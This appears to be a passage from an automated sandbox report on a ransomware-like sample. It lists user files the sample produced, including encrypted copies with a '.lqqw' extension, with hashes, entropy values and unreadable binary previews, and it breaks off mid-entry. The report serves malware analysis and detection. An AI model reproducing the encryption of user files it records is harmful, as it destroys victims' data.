                                                                                                                                                                                                    Preview: ...Z......m&F.~.Qz.#.)...G..</...9Z......RN.'!T....!..u..J..{.,..xTr.kf`.....~j.5y..-$>.ll....V8.5..WN.. d.....)u.w1.....T|...5i..C..BGG.9..L.u..........:.[.Lkn5.3lu..f.1..Z.v.......%.M.t..............GtI......F..i@.....A4..hg.2..D......0.{6G...T.....5x.....D."b...!.c|a..-.#Y.....)....J4l....-.......y/..H....^G....._%..^..l.....QN.s%.y...Y#...&.....1.1.v..D......,....=o.n{..g.l8`}.M<.....+'.)..*....^F..](.&.d.......-.\x.....t....:Okk=....c..4_.....4.k./Y~}3.a.o.... ......l.4r...L.$y..v'(..qD...)&.7..f..P..Z...F.v..M.g..w-c....A.!...D........`..a.'.....*.R..J...sl..aM.........H.]...c2.1...H....Df....v....2[*.?....--.....v..$m.2....J....>b.<..g..1.}i..8....f...Q.m...-..(H.*....Z..p.Zo....+6.F8..wL..bb...8..] *9....AU..K.S.g.....!8..5.._....y.....k'K.h.....h....w...rb,..H.dH.{.{2....!..1.sB4. s.j.1[.14}.5."...G.....19Rc...f .I...#..?..J."....yk.:.Tnn..F..u.i....4S.......O.`..D...c4..,...r..I.(..fJH...r..................b..W.zE\..Ff.k.w.R....
                                                                                                                                                                                                    C:\Users\user\Desktop\GIGIYTFFYT.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.820529971126834
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:KRVL65FFQ2qqqig8oEHihoXUipYyguxX+QkR9WZ0Gs206XXmeulOvUdkinFilbD:s6VQ2LihoXZphvxXVBJ66XXKlOvakiF8
                                                                                                                                                                                                    MD5:E025C812A2E375ED6D0AD3E2895426EE
                                                                                                                                                                                                    SHA1:676AB8BA0EB5D059946EF46BAAE12B81A290E906
                                                                                                                                                                                                    SHA-256:DAC369364B6586CA2316E48B86D6B99CEA8FBF6C7422E07883F60C0F03C6E995
                                                                                                                                                                                                    SHA-512:77A2CA53BA17B0B7937190DDA4BD11F59520A755CD5593A21D36E77E9C4D4FF525F476B0B2385EDEF0A61A2E7B39D20859DD70F6E65E158B97892B5BB2B248B9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...Z......m&F.~.Qz.#.)...G..</...9Z......RN.'!T....!..u..J..{.,..xTr.kf`.....~j.5y..-$>.ll....V8.5..WN.. d.....)u.w1.....T|...5i..C..BGG.9..L.u..........:.[.Lkn5.3lu..f.1..Z.v.......%.M.t..............GtI......F..i@.....A4..hg.2..D......0.{6G...T.....5x.....D."b...!.c|a..-.#Y.....)....J4l....-.......y/..H....^G....._%..^..l.....QN.s%.y...Y#...&.....1.1.v..D......,....=o.n{..g.l8`}.M<.....+'.)..*....^F..](.&.d.......-.\x.....t....:Okk=....c..4_.....4.k./Y~}3.a.o.... ......l.4r...L.$y..v'(..qD...)&.7..f..P..Z...F.v..M.g..w-c....A.!...D........`..a.'.....*.R..J...sl..aM.........H.]...c2.1...H....Df....v....2[*.?....--.....v..$m.2....J....>b.<..g..1.}i..8....f...Q.m...-..(H.*....Z..p.Zo....+6.F8..wL..bb...8..] *9....AU..K.S.g.....!8..5.._....y.....k'K.h.....h....w...rb,..H.dH.{.{2....!..1.sB4. s.j.1[.14}.5."...G.....19Rc...f .I...#..?..J."....yk.:.Tnn..F..u.i....4S.......O.`..D...c4..,...r..I.(..fJH...r..................b..W.zE\..Ff.k.w.R....
                                                                                                                                                                                                    C:\Users\user\Desktop\KLIZUSIQEN.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8455876759216
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:w/23oO35+YmipS3kup9xQkNlMWJyugbGwc558S6XDtZEkjKQnxl5abD:7oOQYm13Bp97lMWJy/GwcLYDXX/AD
                                                                                                                                                                                                    MD5:6F3BE15072385B3A001A6335F9202927
                                                                                                                                                                                                    SHA1:4CE7CFF4F27643D190E918A0CF4B925C74C61FD7
                                                                                                                                                                                                    SHA-256:5246FAB31F57F8D7FD7D4A2C160AC0C36464ECA509B4856A632DDD3857981556
                                                                                                                                                                                                    SHA-512:E934CDE7BBC064024B60F3097C67AE960E05388CA9FDE6D275B6D25352DF75C649DCEECE45F5786E4BBDD4E543762F1845D9957152F8EBEC56489BB32938EAEA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...@(.b.h.N.....$8..H.....}.fy.H....1......_..%.X..qU.(j.& u.........F..?.k......l...0..g.J....c....u..Y..3.j9....Qvup...2.>.`.i..K...i.c.Q.4[>v..Y..d..r].E-...]B...Z....f.?...(>.....%.z...0..G.}..=....a.B......:Qt....>..m.....AC..U.d..._..b..r..T..W.h..wV.$..n..2.v.JSS}.5.7...6gN6.X.....o..#.{.K1C....p.@!.....[m.....+.D.5.K]....@.tIUC.b....b......x.Y....?.....t..X.....Hr..v].=.n...{......H...5a... .o.m..j...5.<A..8*BGX.H....<B.c)B....-!y-..!).....eI.&N.c.t..9...o\.%../._.G.g.....n.&..5......!d2..]u..=..@.....O{..v......n.D\S.?vgAh...*..T......${]..t.....K.....1Q6Z..._.0v.fK...9.91.]#Y0.5/..i.9...f..@<s..Ty.B.`.j...pp.Z..A.N....E..._..z*2..o....Hj.e.U.2.....,..5..C.H...t.<#/xB.....4`x....=..0..q......;..i.l....-....^H.u.O..e..\...t...2_..[c..fu.B...2,.._...I...PT.Y....t..$.q..^.v6Vt'..T.#j.e....@..."k.R..../.&..:..S.&.[..pc.I..W.[.<s-..!..Z.P!".......N.........".y..E..S.j....d....U.2nl.*L-.k`...6...ev.BO.L&.t....g^..N.
                                                                                                                                                                                                    C:\Users\user\Desktop\KLIZUSIQEN.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8455876759216
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:w/23oO35+YmipS3kup9xQkNlMWJyugbGwc558S6XDtZEkjKQnxl5abD:7oOQYm13Bp97lMWJy/GwcLYDXX/AD
                                                                                                                                                                                                    MD5:6F3BE15072385B3A001A6335F9202927
                                                                                                                                                                                                    SHA1:4CE7CFF4F27643D190E918A0CF4B925C74C61FD7
                                                                                                                                                                                                    SHA-256:5246FAB31F57F8D7FD7D4A2C160AC0C36464ECA509B4856A632DDD3857981556
                                                                                                                                                                                                    SHA-512:E934CDE7BBC064024B60F3097C67AE960E05388CA9FDE6D275B6D25352DF75C649DCEECE45F5786E4BBDD4E543762F1845D9957152F8EBEC56489BB32938EAEA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...@(.b.h.N.....$8..H.....}.fy.H....1......_..%.X..qU.(j.& u.........F..?.k......l...0..g.J....c....u..Y..3.j9....Qvup...2.>.`.i..K...i.c.Q.4[>v..Y..d..r].E-...]B...Z....f.?...(>.....%.z...0..G.}..=....a.B......:Qt....>..m.....AC..U.d..._..b..r..T..W.h..wV.$..n..2.v.JSS}.5.7...6gN6.X.....o..#.{.K1C....p.@!.....[m.....+.D.5.K]....@.tIUC.b....b......x.Y....?.....t..X.....Hr..v].=.n...{......H...5a... .o.m..j...5.<A..8*BGX.H....<B.c)B....-!y-..!).....eI.&N.c.t..9...o\.%../._.G.g.....n.&..5......!d2..]u..=..@.....O{..v......n.D\S.?vgAh...*..T......${]..t.....K.....1Q6Z..._.0v.fK...9.91.]#Y0.5/..i.9...f..@<s..Ty.B.`.j...pp.Z..A.N....E..._..z*2..o....Hj.e.U.2.....,..5..C.H...t.<#/xB.....4`x....=..0..q......;..i.l....-....^H.u.O..e..\...t...2_..[c..fu.B...2,.._...I...PT.Y....t..$.q..^.v6Vt'..T.#j.e....@..."k.R..../.&..:..S.&.[..pc.I..W.[.<s-..!..Z.P!".......N.........".y..E..S.j....d....U.2nl.*L-.k`...6...ev.BO.L&.t....g^..N.
                                                                                                                                                                                                    C:\Users\user\Desktop\NWCXBPIUYI.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.855505426919929
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:nREujXkWG8A3Fdlws/Skr3UVfhogdcJpm8fymp6bI2TVZFbbfmpSQ6MsmbD:nRfjXkWqdp30ZogaI8ammJFbbfZ0D
                                                                                                                                                                                                    MD5:AC32D70D26D30ABEF481E958BCDEF6EB
                                                                                                                                                                                                    SHA1:1E6B4BFFF645B5A3A73F41F246693AAE013839CC
                                                                                                                                                                                                    SHA-256:9E9918D57D5345BE616A5564DB66737E4DC6D735B63C0D4B4A81C6C64FC2B5A6
                                                                                                                                                                                                    SHA-512:386C2A2C6CCFD34297BE7A0AFF6231A34CFD0033F02ED4403A79573E851C35A91905566881859D5130F354B3A79428B273AA9C27D0F43F8BC68C06C94B983AF2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .......z.t..F.a..E...^.B..G.=6q.S...u5(.Nh....I5ME_..m'....&k.Q.B......s.....d..o.Y>w...\[........g.:..$A..~.^C..].A..n...U....~C=..B6...&.9..1f=..$..l.{n.o.25.6.2,B.....%%S.*.P..6.?.|....]..8n.>\........$...1#.mA....8R8.FF.a.....N./.........~.)\`...BS.L....~...0.`..W..K......f"$..2x.../...=..qm..C..25(oF....?w4Y...5.......0..7...uP......_.q...M.'.....b.>__....@$..A..p..;.R.J..{v)S.....E...e....J.\...G.:T.........g.... .w..;Zl.&.v..,.K..%.c......M..#.v..]]}.........$..T......<...:2.{(#{..b@<lR..'.Q..{T.>+.V...Z...q.Zo}.B...o......O....$.AYGv4...+.>.g6..k...LLf.).m...e+..v[..;M........[.Z.6]......C..7x...}.9.._.N.qi....F.:..kO..-.\.p..k.......a..|..M..`).....S#q....v../"..@t5..}~.*# {.D.S...h.y.[N.y.-..e.$7....OI.UY...RzU...].....*...z.f&..Sz..v|U..w.......b.....b_[...9.4.X....@.|i.)...+.r.=..|[1.=.."..5J..@a..[K.......b.q..'4..r.>.w..V.@.O%.....q+t8....M.......J\j..T.9...A..Npr:FBR... .(..3..r..;B-x.DL..".&..v..d*...v..+....W..0z..
                                                                                                                                                                                                    C:\Users\user\Desktop\NWCXBPIUYI.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.855505426919929
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:nREujXkWG8A3Fdlws/Skr3UVfhogdcJpm8fymp6bI2TVZFbbfmpSQ6MsmbD:nRfjXkWqdp30ZogaI8ammJFbbfZ0D
                                                                                                                                                                                                    MD5:AC32D70D26D30ABEF481E958BCDEF6EB
                                                                                                                                                                                                    SHA1:1E6B4BFFF645B5A3A73F41F246693AAE013839CC
                                                                                                                                                                                                    SHA-256:9E9918D57D5345BE616A5564DB66737E4DC6D735B63C0D4B4A81C6C64FC2B5A6
                                                                                                                                                                                                    SHA-512:386C2A2C6CCFD34297BE7A0AFF6231A34CFD0033F02ED4403A79573E851C35A91905566881859D5130F354B3A79428B273AA9C27D0F43F8BC68C06C94B983AF2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .......z.t..F.a..E...^.B..G.=6q.S...u5(.Nh....I5ME_..m'....&k.Q.B......s.....d..o.Y>w...\[........g.:..$A..~.^C..].A..n...U....~C=..B6...&.9..1f=..$..l.{n.o.25.6.2,B.....%%S.*.P..6.?.|....]..8n.>\........$...1#.mA....8R8.FF.a.....N./.........~.)\`...BS.L....~...0.`..W..K......f"$..2x.../...=..qm..C..25(oF....?w4Y...5.......0..7...uP......_.q...M.'.....b.>__....@$..A..p..;.R.J..{v)S.....E...e....J.\...G.:T.........g.... .w..;Zl.&.v..,.K..%.c......M..#.v..]]}.........$..T......<...:2.{(#{..b@<lR..'.Q..{T.>+.V...Z...q.Zo}.B...o......O....$.AYGv4...+.>.g6..k...LLf.).m...e+..v[..;M........[.Z.6]......C..7x...}.9.._.N.qi....F.:..kO..-.\.p..k.......a..|..M..`).....S#q....v../"..@t5..}~.*# {.D.S...h.y.[N.y.-..e.$7....OI.UY...RzU...].....*...z.f&..Sz..v|U..w.......b.....b_[...9.4.X....@.|i.)...+.r.=..|[1.=.."..5J..@a..[K.......b.q..'4..r.>.w..V.@.O%.....q+t8....M.......J\j..T.9...A..Npr:FBR... .(..3..r..;B-x.DL..".&..v..d*...v..+....W..0z..
                                                                                                                                                                                                    C:\Users\user\Desktop\PALRGUCVEH.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8401872274284345
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:yP9Y/TedhTxvWPnKlyLcUcDgxT6oh4JZ3Trn0ReZW7IC0pB8A/srl6Nk7M9bD:rSdBNWPnZLDxOohqhTL2bW8Q4l6NT9D
                                                                                                                                                                                                    MD5:56202872F1D0D05A353D1E65B7472828
                                                                                                                                                                                                    SHA1:F8F253EE873850C85258DCD2726F365C0702DAE0
                                                                                                                                                                                                    SHA-256:14DA16ACF6EB778EBC3FD88FCC1AAE0995814E84B62E10FAB710A5C85CED86DD
                                                                                                                                                                                                    SHA-512:644BE0D6498C1A8260A1265BD2464033E6881141411C62E47E4FB86D1753DEACB423E1177500970064644A5743A4675A48D420A0AD6CC919FC3F3C987F77311C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Q.N.4|?.^6.!..q..B8.!l.{.V...X.........W.c..5".....+...{..R}. .JJ..lV3[.Y.K.`....^p.?..d.RRYh2.K^...'b....Du.....L..C......o...F........MG..D......F....'...ZY.r|....c,..........7......#d..d....,..c.3.s..MS.-...4 f..Cpl...P..f.....$l`.O........G.x.I..yNw...b%....X...l.@.q:....G.)..W?/.(.C.....L.$..C.:%Q....rE..h.S!..,(..K5........[r.......M....x.{.2w..c...1\9[+-<..9...9*-p..Q.c.g$...m@"..bN.......,.v.JP..:.....9T=y).....\.Wq....-(Y(..[...r....x..8.}..5..r.#...6..tAq.8..d~....;...6......6.D+u..k.....3....-....d..q...S...3..7...`C.|...R..g=...,.Y.u.[.1z.7....Y..}. ..2.X....<Z...Xde...[.;.!.. ...)...6.......VE..4.UPNK.?.E/[.({...m....?.r.. ...".7r.YL.....T...T..n....T..Z.5..\.'.w.g..6D..:..u...I~.b.P5./.[dR...BM.`T.qJ.5.M.....cw......."......2."..P}0.e..u...8...V..i...0.).#...O^..._N.[...s./.e.w.T...N...*0....>.#pJa.v.....g..*<.^.>.....PW.\.......g^..H..T..=....KB8..|"@..^]\..e.%w~. ..".IlW.$V..>`S<d..$.L.Px..]......07+2....C.9[`..g...L..B.l'.
                                                                                                                                                                                                    C:\Users\user\Desktop\PALRGUCVEH.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8401872274284345
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:yP9Y/TedhTxvWPnKlyLcUcDgxT6oh4JZ3Trn0ReZW7IC0pB8A/srl6Nk7M9bD:rSdBNWPnZLDxOohqhTL2bW8Q4l6NT9D
                                                                                                                                                                                                    MD5:56202872F1D0D05A353D1E65B7472828
                                                                                                                                                                                                    SHA1:F8F253EE873850C85258DCD2726F365C0702DAE0
                                                                                                                                                                                                    SHA-256:14DA16ACF6EB778EBC3FD88FCC1AAE0995814E84B62E10FAB710A5C85CED86DD
                                                                                                                                                                                                    SHA-512:644BE0D6498C1A8260A1265BD2464033E6881141411C62E47E4FB86D1753DEACB423E1177500970064644A5743A4675A48D420A0AD6CC919FC3F3C987F77311C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Q.N.4|?.^6.!..q..B8.!l.{.V...X.........W.c..5".....+...{..R}. .JJ..lV3[.Y.K.`....^p.?..d.RRYh2.K^...'b....Du.....L..C......o...F........MG..D......F....'...ZY.r|....c,..........7......#d..d....,..c.3.s..MS.-...4 f..Cpl...P..f.....$l`.O........G.x.I..yNw...b%....X...l.@.q:....G.)..W?/.(.C.....L.$..C.:%Q....rE..h.S!..,(..K5........[r.......M....x.{.2w..c...1\9[+-<..9...9*-p..Q.c.g$...m@"..bN.......,.v.JP..:.....9T=y).....\.Wq....-(Y(..[...r....x..8.}..5..r.#...6..tAq.8..d~....;...6......6.D+u..k.....3....-....d..q...S...3..7...`C.|...R..g=...,.Y.u.[.1z.7....Y..}. ..2.X....<Z...Xde...[.;.!.. ...)...6.......VE..4.UPNK.?.E/[.({...m....?.r.. ...".7r.YL.....T...T..n....T..Z.5..\.'.w.g..6D..:..u...I~.b.P5./.[dR...BM.`T.qJ.5.M.....cw......."......2."..P}0.e..u...8...V..i...0.).#...O^..._N.[...s./.e.w.T...N...*0....>.#pJa.v.....g..*<.^.>.....PW.\.......g^..H..T..=....KB8..|"@..^]\..e.%w~. ..".IlW.$V..>`S<d..$.L.Px..]......07+2....C.9[`..g...L..B.l'.
                                                                                                                                                                                                    C:\Users\user\Desktop\PALRGUCVEH.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.849467816397729
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:3w243ejwoaz50KAV/+t5hzyBXhBtHeIZaDW8O7j7VE0bD:AfuUoazvAV/S5hUt+q2W8eh9D
                                                                                                                                                                                                    MD5:C9B40891402751B58D473136CD93534B
                                                                                                                                                                                                    SHA1:C60A87EBF31FE3BDAAD4B019046FBA8DEDCF21A6
                                                                                                                                                                                                    SHA-256:25D8322C758BB89A223F4FA7C6DCA1961EAFD024DF0AA739A118A9CA0644E158
                                                                                                                                                                                                    SHA-512:7DF81003BAD29AB4557F4B9914C98A32404B2F2A23792AF1F29DF1EA7E220A7501C6EE4C14147339DC7C705828F4ADE2133D658FF417FDF48784161EF87AB0EF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..?.>.&%. ..oZHi..N.%.?.(=...,...T.I...%...5lN...3..@U....9N..$#/.t.m r$.SS.M..Rg?....5.nk...7.Xj....+d..`~..8.!q.=......d..g.B.V^...7.A.9[...*....z.%,.FvMM,A...A.8a..E......#i......B&e..NACHsRt........?)H......V78..&S.....%P".,/.`..X..........V.4.km.cF....h.......ZN}...m....,.....(.,!.&#..2.c.y..L...r.D.P..,.V.$...Z...;<...li...|.-..?..p. AK..../..a,..b.O0K.k..Y......$.B...k....AHi!........`..NL.hv7...$o..u.6B....*.?\).z8.r.r[.q.....^.(.b"....DI.s.x...M.. ..R/..-..\U..........h(.N>_.....2.Tb1$..>9.A.0..z.Z&..8.U.=.....]..F..$.u.._.....:..?73.&.j.$....6}J.:_....D.+W..M.-H7QG.Ur%Vw.d.n....I}W.O2.U....U......W...1....?ZgCMEz?..ZV..H.p.u.uC.........G...MB|k...'P..!.l.oN.p.A..W....Q....a$.lv..Q.f2.....z*$.><1B...pD..lN._.c~!.....im.l....`r.s.l[I...a./......i..ns.3vL.V..'6.M........W......7......&EI.b.=D:.7q.$z.=....o4*-N.3T.N]J.d.X.J.$o.qj.^....uw.k.|(...?.]CP.:S..OC.a..f...'.....s.LY....;...-..ZVL]...n......,.3.....r.@K.1
                                                                                                                                                                                                    C:\Users\user\Desktop\PALRGUCVEH.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.849467816397729
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:3w243ejwoaz50KAV/+t5hzyBXhBtHeIZaDW8O7j7VE0bD:AfuUoazvAV/S5hUt+q2W8eh9D
                                                                                                                                                                                                    MD5:C9B40891402751B58D473136CD93534B
                                                                                                                                                                                                    SHA1:C60A87EBF31FE3BDAAD4B019046FBA8DEDCF21A6
                                                                                                                                                                                                    SHA-256:25D8322C758BB89A223F4FA7C6DCA1961EAFD024DF0AA739A118A9CA0644E158
                                                                                                                                                                                                    SHA-512:7DF81003BAD29AB4557F4B9914C98A32404B2F2A23792AF1F29DF1EA7E220A7501C6EE4C14147339DC7C705828F4ADE2133D658FF417FDF48784161EF87AB0EF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..?.>.&%. ..oZHi..N.%.?.(=...,...T.I...%...5lN...3..@U....9N..$#/.t.m r$.SS.M..Rg?....5.nk...7.Xj....+d..`~..8.!q.=......d..g.B.V^...7.A.9[...*....z.%,.FvMM,A...A.8a..E......#i......B&e..NACHsRt........?)H......V78..&S.....%P".,/.`..X..........V.4.km.cF....h.......ZN}...m....,.....(.,!.&#..2.c.y..L...r.D.P..,.V.$...Z...;<...li...|.-..?..p. AK..../..a,..b.O0K.k..Y......$.B...k....AHi!........`..NL.hv7...$o..u.6B....*.?\).z8.r.r[.q.....^.(.b"....DI.s.x...M.. ..R/..-..\U..........h(.N>_.....2.Tb1$..>9.A.0..z.Z&..8.U.=.....]..F..$.u.._.....:..?73.&.j.$....6}J.:_....D.+W..M.-H7QG.Ur%Vw.d.n....I}W.O2.U....U......W...1....?ZgCMEz?..ZV..H.p.u.uC.........G...MB|k...'P..!.l.oN.p.A..W....Q....a$.lv..Q.f2.....z*$.><1B...pD..lN._.c~!.....im.l....`r.s.l[I...a./......i..ns.3vL.V..'6.M........W......7......&EI.b.=D:.7q.$z.=....o4*-N.3T.N]J.d.X.J.$o.qj.^....uw.k.|(...?.]CP.:S..OC.a..f...'.....s.LY....;...-..ZVL]...n......,.3.....r.@K.1
                                                                                                                                                                                                    C:\Users\user\Desktop\PALRGUCVEH\EIVQSAOTAQ.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.839211542344949
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:ckvyc/7AZj3qsYFBygt4pbS6XlxCIQYcHD2gEpXY0VjXAAZA/wU/Z4s6L7HXbD:ckvyc/7nJFBKxCIsHDuBRxA9YU/ZOrD
                                                                                                                                                                                                    MD5:BD781DE2EA826980B19DD0E82C089AA6
                                                                                                                                                                                                    SHA1:650F339126A74B084CC0A2641E36F0EC0181F16B
                                                                                                                                                                                                    SHA-256:F08E7CD5B2819A94C2D3A1EB32BB0492FC4A71A120AFE3EADFAD33E53F2B1711
                                                                                                                                                                                                    SHA-512:EE6CC866B4F0264286D63EBA04231C4F8C0393303D0F509509A0AC74A5A3B5F82F6DEB9B3DC7873FD434F35BE06A93B83A88DCD8C8C72314E279446901D35EB9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..=Q>...*.......J.`....k..hlT].U.W.......7..../...$.6t).[.... k..c.............x.y.O.zP.J.B*....a.j..rv,..X...tR.JmE.....cu.-..J5\..F..-.......!|....md.P50FGC_..C...#.7.s@T+5....-...8.......-..t.v;......).`jf.<B.OY....X...2.....b.i.t....dC.J.YlZ.B.`nZM.a....t....wm.^;......j..RqG....!...E|.l_X.f}2b...2*....D....}.....[.....7B........Jn....M9.McU.L...d..2Q.......P.t...P.*.,...!D..<..._+NX..F.|..........V[.....NfKL._.4.5}........Bs.....2...3...ZB..l..Q0....M.n.I..0...._.z.t.UG.}.!,...yoL.......X.....m...<.XQ_w..z..EiT.U}..;...-...FNz.&u....Y.:.`.\]f...k.....9'.D.X.K..)..|1 SV.v=.,.......>..v......*2..r.........#..oY..b..4=.......-\.T....'8..IB.....PG`\.....o..\..l^.-W........[...Q..m...Yh`Z..?O.W.O.f.\......$v.....=g..x...d...$..3.|"........M..E]..V..qH$.<u..H.)0...Z..ns.1..C".P.i...).H:.j...I..Y. N...`..'.T.H.O..z.|Z_..--..S.f..M......M.Ji....\j.J.l..Oi/....#y}.=S|.0..K....c.n.H..].F......X.3.</...kT".^.g...;....H8F.;.5..<=`.C.._.}.~.xJ
                                                                                                                                                                                                    C:\Users\user\Desktop\PALRGUCVEH\EIVQSAOTAQ.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.839211542344949
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:ckvyc/7AZj3qsYFBygt4pbS6XlxCIQYcHD2gEpXY0VjXAAZA/wU/Z4s6L7HXbD:ckvyc/7nJFBKxCIsHDuBRxA9YU/ZOrD
                                                                                                                                                                                                    MD5:BD781DE2EA826980B19DD0E82C089AA6
                                                                                                                                                                                                    SHA1:650F339126A74B084CC0A2641E36F0EC0181F16B
                                                                                                                                                                                                    SHA-256:F08E7CD5B2819A94C2D3A1EB32BB0492FC4A71A120AFE3EADFAD33E53F2B1711
                                                                                                                                                                                                    SHA-512:EE6CC866B4F0264286D63EBA04231C4F8C0393303D0F509509A0AC74A5A3B5F82F6DEB9B3DC7873FD434F35BE06A93B83A88DCD8C8C72314E279446901D35EB9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..=Q>...*.......J.`....k..hlT].U.W.......7..../...$.6t).[.... k..c.............x.y.O.zP.J.B*....a.j..rv,..X...tR.JmE.....cu.-..J5\..F..-.......!|....md.P50FGC_..C...#.7.s@T+5....-...8.......-..t.v;......).`jf.<B.OY....X...2.....b.i.t....dC.J.YlZ.B.`nZM.a....t....wm.^;......j..RqG....!...E|.l_X.f}2b...2*....D....}.....[.....7B........Jn....M9.McU.L...d..2Q.......P.t...P.*.,...!D..<..._+NX..F.|..........V[.....NfKL._.4.5}........Bs.....2...3...ZB..l..Q0....M.n.I..0...._.z.t.UG.}.!,...yoL.......X.....m...<.XQ_w..z..EiT.U}..;...-...FNz.&u....Y.:.`.\]f...k.....9'.D.X.K..)..|1 SV.v=.,.......>..v......*2..r.........#..oY..b..4=.......-\.T....'8..IB.....PG`\.....o..\..l^.-W........[...Q..m...Yh`Z..?O.W.O.f.\......$v.....=g..x...d...$..3.|"........M..E]..V..qH$.<u..H.)0...Z..ns.1..C".P.i...).H:.j...I..Y. N...`..'.T.H.O..z.|Z_..--..S.f..M......M.Ji....\j.J.l..Oi/....#y}.=S|.0..K....c.n.H..].F......X.3.</...kT".^.g...;....H8F.;.5..<=`.C.._.}.~.xJ
                                                                                                                                                                                                    C:\Users\user\Desktop\PALRGUCVEH\EOWRVPQCCS.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8501540830562915
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:1grLGvypfj1CfZiUwrhy8906BUW5JcnIEJG5wI85H++yUI2IvUcAbD:22vyp8f2t90+fGIEJG576++yUmMcaD
                                                                                                                                                                                                    MD5:3ACD37A1A933EB4F02A25AA829072DA6
                                                                                                                                                                                                    SHA1:4A8C9AC4F9385D11BC436EBA87D6836662522300
                                                                                                                                                                                                    SHA-256:BF46E0DF61E5BD4BB3137A1BAB6250D7FB80D0301926E5D51B304499F81FFF9C
